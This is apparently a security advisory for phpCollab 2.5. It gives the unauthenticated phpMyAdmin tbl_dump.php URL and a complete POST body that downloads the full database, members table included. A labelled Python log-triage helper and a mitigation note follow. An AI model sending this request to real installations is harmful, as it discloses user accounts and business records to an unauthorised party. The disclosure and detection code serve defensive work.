PHPCollab 2.5 Database Backup Disclosure

2012.05.23
Credit: team
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: phpcollab Unauthenticated Database Backup Download
# Date: 3/5/2012
# Author: team ' and 1=1--
# Software Link: http://www.phpcollab.com/
# Version: 2.5
# Vulnerability was found during the AthCon IT Security Conference CTF
# CTF organizer: echothrust

During the AthCon CTF the team ' and 1=1-- identified that a potential attacker is able to download the database backup of the phpcollab instance installed under the following URL:

http://xxx.xxx.xxx.xxx/phpcollab/

The vulnerability can be exploited by sending the following POST request to the phpMyAdmin dump script bundled with phpcollab:

http://xxx.xxx.xxx.xxx/phpcollab/includes/phpmyadmin/tbl_dump.php

POST DATA:

table_select%5B%5D=assignments&table_select%5B%5D=bookmarks&table_select%5B%5D=bookmarks_categories&table_select%5B%5D=calendar&table_select%5B%5D=files&table_select%5B%5D=invoices&table_select%5B%5D=invoices_items&table_select%5B%5D=logs&table_select%5B%5D=members&table_select%5B%5D=newsdeskcomments&table_select%5B%5D=newsdeskposts&table_select%5B%5D=notes&table_select%5B%5D=notifications&table_select%5B%5D=organizations&table_select%5B%5D=phases&table_select%5B%5D=posts&table_select%5B%5D=projects&table_select%5B%5D=reports&table_select%5B%5D=services&table_select%5B%5D=sorting&table_select%5B%5D=subtasks&table_select%5B%5D=support_posts&table_select%5B%5D=support_requests&table_select%5B%5D=tasks&table_select%5B%5D=teams&table_select%5B%5D=topics&table_select%5B%5D=updates&what=data&drop=1&asfile=sendit&server=1&lang=en&db=phpcollab
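A triage helper for this finding, added here as an example and not part of the advisory or of phpcollab: it flags requests to the bundled phpMyAdmin dump script and decodes which tables a request asked for, so a responder can scope what was disclosed. It assumes request records that include the POST body (for instance from a reverse proxy that logs bodies); the sample records, client addresses and the SENSITIVE table set are constructed for the example.

```python
"""Triage helper for the phpcollab tbl_dump.php exposure (added example).
Assumes request records carrying method, path and POST body, e.g. from a
reverse proxy that logs bodies; a hit seen only in an access log (no body)
is still reported, just without table detail."""
from urllib.parse import parse_qs, urlsplit

DUMP_PATH = "/phpcollab/includes/phpmyadmin/tbl_dump.php"
# Tables to call out first in triage; an editorial choice for this example,
# not a classification taken from the advisory.
SENSITIVE = {"members", "logs", "invoices", "notes", "support_requests"}


def analyze_request(method, path, body=""):
    """Return None for unrelated requests, else a summary of the dump attempt."""
    url = urlsplit(path)
    if url.path.lower() != DUMP_PATH:
        return None
    # phpMyAdmin accepts the same parameters in the query string or the body.
    params = parse_qs(url.query)
    if method.upper() == "POST":
        for key, values in parse_qs(body).items():
            params.setdefault(key, []).extend(values)
    tables = params.get("table_select[]", [])  # parse_qs decodes %5B%5D to []
    first = lambda key: params.get(key, [None])[0]
    return {
        "db": first("db"),
        "tables": tables,
        "sensitive": sorted(SENSITIVE.intersection(tables)),
        "full_data_export": first("what") == "data",
        "served_as_file": first("asfile") == "sendit",
    }


def triage(records):
    """Apply analyze_request to (client, method, path, body) tuples."""
    findings = []
    for client, method, path, body in records:
        result = analyze_request(method, path, body)
        if result is not None:
            findings.append((client, result))
    return findings


# Constructed sample records: one ordinary page view, one dump download.
SAMPLE_RECORDS = [
    ("198.51.100.7", "GET", "/phpcollab/index.php", ""),
    ("203.0.113.9", "POST", DUMP_PATH,
     "table_select%5B%5D=members&table_select%5B%5D=tasks"
     "&what=data&drop=1&asfile=sendit&server=1&lang=en&db=phpcollab"),
]
```

Denying web access to the includes/phpmyadmin/ directory at the web server removes the unauthenticated path; this script only helps establish which tables an earlier request already exported.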

References:

http://www.phpcollab.com/



Copyright 2024, cxsecurity.com
